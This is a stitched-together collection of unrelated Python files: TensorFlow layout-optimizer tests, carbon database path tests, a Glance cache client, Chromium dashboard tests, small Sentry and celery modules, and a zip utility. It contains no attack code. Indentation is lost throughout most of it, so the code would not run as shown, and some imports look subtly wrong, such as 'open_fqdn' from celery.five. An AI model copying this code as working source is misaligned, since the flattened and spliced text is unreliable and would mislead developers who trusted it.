self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Slice-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Slice-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
s = array_ops.strided_slice(conv, [0, 0, 0, 0], end, strides=[1, 2, 3, 1])
output = array_ops.identity(s)
end_val = [1, 2, 3, 4]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('StridedSlice-0-0', nodes)
self._assert_vec_nhwc_to_nchw('StridedSlice-2', nodes)
self.assertIn('StridedSlice-1-LayoutOptimizer', nodes)
self.assertIn('StridedSlice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask1011(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
      # This generates a StridedSlice op whose begin mask and end mask are
      # both 11 (binary 1011).
s = conv[:, :, 1:-1, :]
output = array_ops.identity(s)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('strided_slice-0-0', nodes)
self.assertIn('strided_slice-1-LayoutOptimizer', nodes)
self.assertIn('strided_slice-2-LayoutOptimizer', nodes)
self.assertIn('strided_slice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask0111(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
      # This generates a StridedSlice op whose begin mask and end mask are
      # both 7 (binary 0111).
s = conv[:, :, :, 1:-1]
output = array_ops.identity(s)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('strided_slice-0-0', nodes)
self.assertIn('strided_slice-1-LayoutOptimizer', nodes)
self.assertIn('strided_slice-2-LayoutOptimizer', nodes)
self.assertIn('strided_slice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceGradWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
shape = array_ops.shape(conv)
end_val = [1, 2, 3, 4]
s = array_ops.strided_slice(
conv, [0, 0, 0, 0], end_val, strides=[1, 2, 3, 1])
s_grad = array_ops.strided_slice_grad(shape, [0, 0, 0, 0], end,
[1, 2, 3, 1], s)
output = array_ops.identity(s_grad)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('StridedSliceGrad-0-0', nodes)
self._assert_vec_nhwc_to_nchw('StridedSliceGrad-2', nodes)
self.assertIn('StridedSlice-1-LayoutOptimizer', nodes)
self.assertIn('StridedSlice-2-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testShapeN(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shapen = array_ops.shape_n([conv, conv])
output = math_ops.add(shapen[0], shapen[1])
x_val = [1.7] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_vec_nchw_to_nhwc('ShapeN-0-0', nodes)
self.assertAllEqual(output_val_ref, output_val)
def testShapeNFollowedByNotConvertibleNodeReshape(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
conv_reshape = array_ops.reshape(conv, [1, 1, 1, -1])
shapen = array_ops.shape_n([conv, conv_reshape])
shape = array_ops.identity(shapen[1])
ones = array_ops.ones(shape)
output = math_ops.add_n([conv_reshape, ones])
x_val = [1.7] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={x: x_val})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoop(self):
if test.is_gpu_available(cuda_only=True):
output = _loop()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/MaxPool_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithBranch(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_branch()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 3
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/Add_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithVecAnd4D(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_vec_and_4d()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/Add_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testBinaryOpSecondPort(self):
if test.is_gpu_available(cuda_only=True):
output = _model_with_second_port()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('FusedBatchNorm-0', nodes)
self._assert_trans_nchw_to_nhwc('Add-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
@test_util.run_deprecated_v1
def testGradient(self):
meta_graph = _simple_metagraph()
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.CopyFrom(
rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
min_graph_nodes=-1))
optimized_graph = tf_optimizer.OptimizeGraph(
config, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in ['Conv2D', 'Conv2DBackpropFilter', 'Conv2DBackpropInput']:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 5)
@test_util.run_deprecated_v1
def testDepthwise(self):
meta_graph = _simple_metagraph(depthwise=True)
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.CopyFrom(
rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
min_graph_nodes=-1))
optimized_graph = tf_optimizer.OptimizeGraph(
config, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in [
'DepthwiseConv2dNative', 'DepthwiseConv2dNativeBackpropFilter',
'DepthwiseConv2dNativeBackpropInput'
]:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 6)
def testCheckpointCompatibility(self):
if not test.is_gpu_available(cuda_only=True):
self.skipTest('GPU required')
checkpoint_path = self.get_temp_dir()
self._train(checkpoint_path)
vars_expected = self._train(checkpoint_path, restore=True)
vars_layout_optimized = self._train(
checkpoint_path, restore=True, layout_optimizer=True)
for var_expected, var_layout_optimized in zip(vars_expected,
vars_layout_optimized):
self.assertAllClose(var_expected, var_layout_optimized, atol=1e-6)
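
# Every GPU test above repeats the same scan over metadata.cost_graph to count
# Transpose nodes. A helper along these lines could factor that out; it relies
# only on the module-level _is_transpose predicate already used by the tests,
# and the helper name itself is hypothetical:
def _count_transposes(metadata):
  """Returns (num_transposes, node_names) for a RunMetadata cost graph."""
  nodes = []
  num_transposes = 0
  for node in metadata.cost_graph.node:
    if _is_transpose(node.name):
      num_transposes += 1
    nodes.append(node.name)
  return num_transposes, nodes
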
if __name__ == '__main__':
test.main()
|
import os
from unittest import TestCase
from mock import patch
from os.path import exists
import shutil
from carbon.tests.util import TestSettings
from carbon.database import WhisperDatabase, CeresDatabase
class WhisperDatabaseTest(TestCase):
def setUp(self):
self._sep_patch = patch.object(os.path, 'sep', "/")
self._sep_patch.start()
def tearDown(self):
self._sep_patch.stop()
def test_getFilesystemPath(self):
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
database = WhisperDatabase(settings)
result = database.getFilesystemPath('stats.example.counts')
self.assertEqual(result, '/tmp/stats/example/counts.wsp') # nosec
def test_getTaggedFilesystemPath(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = WhisperDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1.wsp') # nosec
result = database.exists(metric)
self.assertEqual(result, False)
def test_getTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = True
database = WhisperDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0.wsp')
result = database.exists(metric)
self.assertEqual(result, False)
def test_migrateTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = WhisperDatabase(settings)
result = database.exists(metric)
self.assertEqual(result, False)
old_path = database.getFilesystemPath(metric)
self.assertEqual(
old_path, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1.wsp') # nosec
self.assertEqual(exists(old_path), False)
result = database.create(metric, [(60, 60)], 0.5, 'average')
self.assertEqual(exists(old_path), True)
result = database.exists(metric)
self.assertEqual(result, True)
settings['TAG_HASH_FILENAMES'] = True
database = WhisperDatabase(settings)
hashed_path = database.getFilesystemPath(metric)
self.assertEqual(
hashed_path,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0.wsp')
self.assertEqual(exists(hashed_path), False)
result = database.exists(metric)
self.assertEqual(result, True)
self.assertEqual(exists(old_path), False)
self.assertEqual(exists(hashed_path), True)
os.remove(hashed_path)
class CeresDatabaseTest(TestCase):
def setUp(self):
self._sep_patch = patch.object(os.path, 'sep', "/")
self._sep_patch.start()
def tearDown(self):
self._sep_patch.stop()
def test_getFilesystemPath(self):
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
database = CeresDatabase(settings)
result = database.getFilesystemPath('stats.example.counts')
self.assertEqual(result, '/tmp/stats/example/counts') # nosec
def test_getTaggedFilesystemPath(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = CeresDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1') # nosec
result = database.exists(metric)
self.assertEqual(result, False)
def test_getTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = True
database = CeresDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0')
result = database.exists(metric)
self.assertEqual(result, False)
def test_migrateTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = CeresDatabase(settings)
result = database.exists(metric)
self.assertEqual(result, False)
old_path = database.getFilesystemPath(metric)
self.assertEqual(
old_path, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1') # nosec
self.assertEqual(exists(old_path), False)
result = database.create(metric, [(60, 60)], 0.5, 'average')
self.assertEqual(exists(old_path), True)
result = database.exists(metric)
self.assertEqual(result, True)
settings['TAG_HASH_FILENAMES'] = True
database = CeresDatabase(settings)
hashed_path = database.getFilesystemPath(metric)
self.assertEqual(
hashed_path,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0')
self.assertEqual(exists(hashed_path), False)
result = database.exists(metric)
self.assertEqual(result, True)
self.assertEqual(exists(old_path), False)
self.assertEqual(exists(hashed_path), True)
shutil.rmtree(hashed_path)
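
# The hashed paths asserted above follow carbon's tagged-metric layout: a hex
# digest of the full metric name, sharded into two 3-character directories.
# A minimal sketch of that derivation, assuming the digest is the sha256 of
# the raw metric string (the helper name is illustrative only):
def _expected_hashed_path(data_dir, metric, suffix=''):
    import hashlib
    digest = hashlib.sha256(metric.encode('utf-8')).hexdigest()
    return '%s_tagged/%s/%s/%s%s' % (
        data_dir, digest[:3], digest[3:6], digest, suffix)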
|
import os
from oslo.serialization import jsonutils as json
from glance.common import client as base_client
from glance.common import exception
from glance import i18n
_ = i18n._
class CacheClient(base_client.BaseClient):
DEFAULT_PORT = 9292
DEFAULT_DOC_ROOT = '/v1'
def delete_cached_image(self, image_id):
"""
Delete a specified image from the cache
"""
self.do_request("DELETE", "/cached_images/%s" % image_id)
return True
def get_cached_images(self, **kwargs):
"""
Returns a list of images stored in the image cache.
"""
res = self.do_request("GET", "/cached_images")
data = json.loads(res.read())['cached_images']
return data
def get_queued_images(self, **kwargs):
"""
Returns a list of images queued for caching
"""
res = self.do_request("GET", "/queued_images")
data = json.loads(res.read())['queued_images']
return data
def delete_all_cached_images(self):
"""
Delete all cached images
"""
res = self.do_request("DELETE", "/cached_images")
data = json.loads(res.read())
num_deleted = data['num_deleted']
return num_deleted
def queue_image_for_caching(self, image_id):
"""
Queue an image for prefetching into cache
"""
self.do_request("PUT", "/queued_images/%s" % image_id)
return True
def delete_queued_image(self, image_id):
"""
Delete a specified image from the cache queue
"""
self.do_request("DELETE", "/queued_images/%s" % image_id)
return True
def delete_all_queued_images(self):
"""
Delete all queued images
"""
res = self.do_request("DELETE", "/queued_images")
data = json.loads(res.read())
num_deleted = data['num_deleted']
return num_deleted
def get_client(host, port=None, timeout=None, use_ssl=False, username=None,
password=None, tenant=None,
auth_url=None, auth_strategy=None,
auth_token=None, region=None,
is_silent_upload=False, insecure=False):
"""
    Returns a new Glance CacheClient object based on common kwargs.
    If an option isn't specified, it falls back to common environment
    variable defaults.
"""
if auth_url or os.getenv('OS_AUTH_URL'):
force_strategy = 'keystone'
else:
force_strategy = None
creds = {
'username': username or
os.getenv('OS_AUTH_USER', os.getenv('OS_USERNAME')),
'password': password or
os.getenv('OS_AUTH_KEY', os.getenv('OS_PASSWORD')),
'tenant': tenant or
os.getenv('OS_AUTH_TENANT', os.getenv('OS_TENANT_NAME')),
'auth_url': auth_url or
os.getenv('OS_AUTH_URL'),
'strategy': force_strategy or
auth_strategy or
os.getenv('OS_AUTH_STRATEGY', 'noauth'),
'region': region or
os.getenv('OS_REGION_NAME'),
}
if creds['strategy'] == 'keystone' and not creds['auth_url']:
msg = _("--os_auth_url option or OS_AUTH_URL environment variable "
"required when keystone authentication strategy is enabled\n")
raise exception.ClientConfigurationError(msg)
return CacheClient(
host=host,
port=port,
timeout=timeout,
use_ssl=use_ssl,
auth_token=auth_token or
os.getenv('OS_TOKEN'),
creds=creds,
insecure=insecure)
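
# A minimal usage sketch (host and image id are placeholders; keystone
# credentials are read from OS_* environment variables when present):
#
#     client = get_client('127.0.0.1')
#     client.queue_image_for_caching('<image-id>')
#     print client.get_queued_images()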
|
import sys
# Queue was renamed to queue in Python 3.
if sys.version_info[:2] >= (3, 3):
    import queue
else:
    import Queue as queue

from pickle import PicklingError

# multiprocessing.process only exposes BaseProcess from Python 3.4 on.
if sys.version_info >= (3, 4):
    from multiprocessing.process import BaseProcess
else:
    from multiprocessing.process import Process as BaseProcess

# Platform-specific primitives live in the sibling compat modules.
if sys.platform == "win32":
    from .compat_win32 import *
else:
    from .compat_posix import *
|
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import group_report
from dashboard import test_owner
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import bug_data
from dashboard.models import sheriff
from dashboard.models import stoppage_alert
class GroupReportTest(testing_common.TestCase):
def setUp(self):
super(GroupReportTest, self).setUp()
app = webapp2.WSGIApplication(
[('/group_report', group_report.GroupReportHandler)])
self.testapp = webtest.TestApp(app)
def _AddAnomalyEntities(
self, revision_ranges, test_key, sheriff_key, bug_id=None):
"""Adds a group of Anomaly entities to the datastore."""
urlsafe_keys = []
for start_rev, end_rev in revision_ranges:
anomaly_key = anomaly.Anomaly(
start_revision=start_rev, end_revision=end_rev,
test=test_key, bug_id=bug_id, sheriff=sheriff_key,
median_before_anomaly=100, median_after_anomaly=200).put()
urlsafe_keys.append(anomaly_key.urlsafe())
return urlsafe_keys
def _AddTests(self):
"""Adds sample Test entities and returns their keys."""
testing_common.AddTests(['ChromiumGPU'], ['linux-release'], {
'scrolling-benchmark': {
'first_paint': {},
'mean_frame_time': {},
}
})
keys = [
utils.TestKey(
'ChromiumGPU/linux-release/scrolling-benchmark/first_paint'),
utils.TestKey(
'ChromiumGPU/linux-release/scrolling-benchmark/mean_frame_time'),
]
# By default, all Test entities have an improvement_direction of UNKNOWN,
# meaning that neither direction is considered an improvement.
# Here we set the improvement direction so that some anomalies are
# considered improvements.
for test_key in keys:
test = test_key.get()
test.improvement_direction = anomaly.DOWN
test.put()
return keys
def _AddSheriff(self):
"""Adds a Sheriff entity and returns the key."""
return sheriff.Sheriff(
id='Chromium Perf Sheriff', email='sullivan@google.com').put()
def testGet_WithAnomalyKeys_ShowsSelectedAndOverlapping(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
selected_ranges = [(400, 900), (200, 700)]
overlapping_ranges = [(300, 500), (500, 600), (600, 800)]
non_overlapping_ranges = [(100, 200)]
selected_keys = self._AddAnomalyEntities(
selected_ranges, test_keys[0], sheriff_key)
self._AddAnomalyEntities(
overlapping_ranges, test_keys[0], sheriff_key)
self._AddAnomalyEntities(
non_overlapping_ranges, test_keys[0], sheriff_key)
response = self.testapp.get(
'/group_report?keys=%s' % ','.join(selected_keys))
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
    # Expect the two selected alerts plus the three overlapping alerts, but
    # not the non-overlapping alert.
self.assertEqual(5, len(alert_list))
def testGet_WithKeyOfNonExistentAlert_ShowsError(self):
key = ndb.Key('Anomaly', 123)
response = self.testapp.get('/group_report?keys=%s' % key.urlsafe())
self.assertIn('error', response.body)
self.assertIn('No Anomaly found for key', response.body)
def testGet_WithInvalidKeyParameter_ShowsError(self):
response = self.testapp.get('/group_report?keys=foobar')
self.assertIn('error', response.body)
self.assertIn('Invalid Anomaly key', response.body)
def testGet_WithRevParameter(self):
    # If the rev parameter is given, all alerts whose revision range
    # includes that revision should be listed. Revision 200 falls inside
    # (190, 210), (200, 300) and (100, 200), but not (400, 500).
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
self._AddAnomalyEntities(
[(190, 210), (200, 300), (100, 200), (400, 500)],
test_keys[0], sheriff_key)
response = self.testapp.get('/group_report?rev=200')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(3, len(alert_list))
def testGet_WithInvalidRevParameter_ShowsError(self):
response = self.testapp.get('/group_report?rev=foo')
self.assertIn('error', response.body)
self.assertIn('Invalid rev', response.body)
def testGet_WithBugIdParameter(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
self._AddAnomalyEntities(
[(200, 300), (100, 200), (400, 500)],
test_keys[0], sheriff_key, bug_id=123)
self._AddAnomalyEntities(
[(150, 250)], test_keys[0], sheriff_key)
response = self.testapp.get('/group_report?bug_id=123')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(3, len(alert_list))
def testGet_WithBugIdParameter_ListsStoppageAlerts(self):
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
row = testing_common.AddRows(utils.TestPath(test_keys[0]), {100})[0]
alert = stoppage_alert.CreateStoppageAlert(test_keys[0].get(), row)
alert.bug_id = 123
alert.put()
response = self.testapp.get('/group_report?bug_id=123')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(1, len(alert_list))
def testGet_WithBugIdForBugThatHasOwner_ShowsOwnerInfo(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
test_key = test_keys[0]
test_path_parts = utils.TestPath(test_key).split('/')
test_suite_path = '%s/%s' % (test_path_parts[0], test_path_parts[2])
test_owner.AddOwnerFromDict({test_suite_path: ['foo@bar.com']})
self._AddAnomalyEntities([(150, 250)], test_key, sheriff_key, bug_id=123)
response = self.testapp.get('/group_report?bug_id=123')
owner_info = self.GetEmbeddedVariable(response, 'OWNER_INFO')
self.assertEqual('foo@bar.com', owner_info[0]['email'])
def testGet_WithInvalidBugIdParameter_ShowsError(self):
response = self.testapp.get('/group_report?bug_id=foo')
self.assertNotIn('ALERT_LIST', response.body)
self.assertIn('Invalid bug ID', response.body)
if __name__ == '__main__':
unittest.main()
|
from __future__ import unicode_literals
from ..model import Level1Design
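
# Each map below records the metadata expected on the corresponding input or
# output trait; the loops compare every (key, metakey) pair against the spec
# actually exposed by Level1Design.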
def test_Level1Design_inputs():
    input_map = dict(
        bases=dict(mandatory=True),
        contrasts=dict(),
        ignore_exception=dict(nohash=True, usedefault=True),
        interscan_interval=dict(mandatory=True),
        model_serial_correlations=dict(mandatory=True),
        orthogonalization=dict(),
        session_info=dict(mandatory=True),
    )
inputs = Level1Design.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_Level1Design_outputs():
    output_map = dict(
        ev_files=dict(),
        fsf_files=dict(),
    )
outputs = Level1Design.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
"""
sentry.client.celery.tasks
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from celery.decorators import task
from sentry.client.base import SentryClient
from sentry.client.celery import conf
@task(routing_key=conf.CELERY_ROUTING_KEY)
def send(data):
return SentryClient().send(**data)
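
# Usage sketch: the data dict is forwarded as keyword arguments to
# SentryClient.send, so callers enqueue payloads such as (field names depend
# on the client version and are illustrative):
#
#     send.delay({'message': 'something broke', 'level': 40})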
|
import argparse
import zipfile
import os
import sys
def _zip_dir(path, zip_file, prefix):
  """Recursively adds the contents of a directory to the zip file."""
  path = path.rstrip('/\\')
  for root, _, files in os.walk(path):
    for file_name in files:
      # Rebase the on-disk directory onto the archive prefix; slicing rewrites
      # only the leading portion of root, unlike str.replace.
      archive_dir = prefix + root[len(path):]
      zip_file.write(os.path.join(root, file_name),
                     os.path.join(archive_dir, file_name))
def main(args):
zip_file = zipfile.ZipFile(args.output, 'w', zipfile.ZIP_DEFLATED)
for path, archive_name in args.input_pairs:
if os.path.isdir(path):
_zip_dir(path, zip_file, archive_name)
else:
zip_file.write(path, archive_name)
zip_file.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='This script creates zip files.')
parser.add_argument('-o', dest='output', action='store',
help='The name of the output zip file.')
parser.add_argument('-i', dest='input_pairs', nargs=2, action='append',
help='The input file and its destination location in the zip archive.')
sys.exit(main(parser.parse_args()))
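
# Example invocation (the script name and file names are placeholders; each
# -i pair maps an input path to its destination inside the archive):
#
#   python make_zip.py -o out.zip -i assets assets -i LICENSE LICENSE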
|
from __future__ import absolute_import
import errno
import os
import sys
import signal
from celery import _find_option_with_arg
from celery import platforms
from celery.five import open_fqdn
from celery.platforms import (
get_fdmax,
ignore_errno,
set_process_title,
signals,
maybe_drop_privileges,
setuid,
setgid,
initgroups,
parse_uid,
parse_gid,
detached,
DaemonContext,
create_pidlock,
Pidfile,
LockFailed,
setgroups,
_setgroups_hack,
close_open_fds,
)
try:
import resource
except ImportError: # pragma: no cover
resource = None # noqa
from celery.tests.case import (
Case, WhateverIO, Mock, SkipTest,
call, override_stdouts, mock_open, patch,
)
class test_find_option_with_arg(Case):
def test_long_opt(self):
self.assertEqual(
_find_option_with_arg(['--foo=bar'], long_opts=['--foo']),
'bar'
)
def test_short_opt(self):
self.assertEqual(
_find_option_with_arg(['-f', 'bar'], short_opts=['-f']),
'bar'
)
class test_close_open_fds(Case):
def test_closes(self):
with patch('os.close') as _close:
with patch('os.closerange', create=True) as closerange:
with patch('celery.platforms.get_fdmax') as fdmax:
fdmax.return_value = 3
close_open_fds()
if not closerange.called:
_close.assert_has_calls([call(2), call(1), call(0)])
_close.side_effect = OSError()
_close.side_effect.errno = errno.EBADF
close_open_fds()
class test_ignore_errno(Case):
def test_raises_EBADF(self):
with ignore_errno('EBADF'):
exc = OSError()
exc.errno = errno.EBADF
raise exc
def test_otherwise(self):
with self.assertRaises(OSError):
with ignore_errno('EBADF'):
exc = OSError()
exc.errno = errno.ENOENT
raise exc
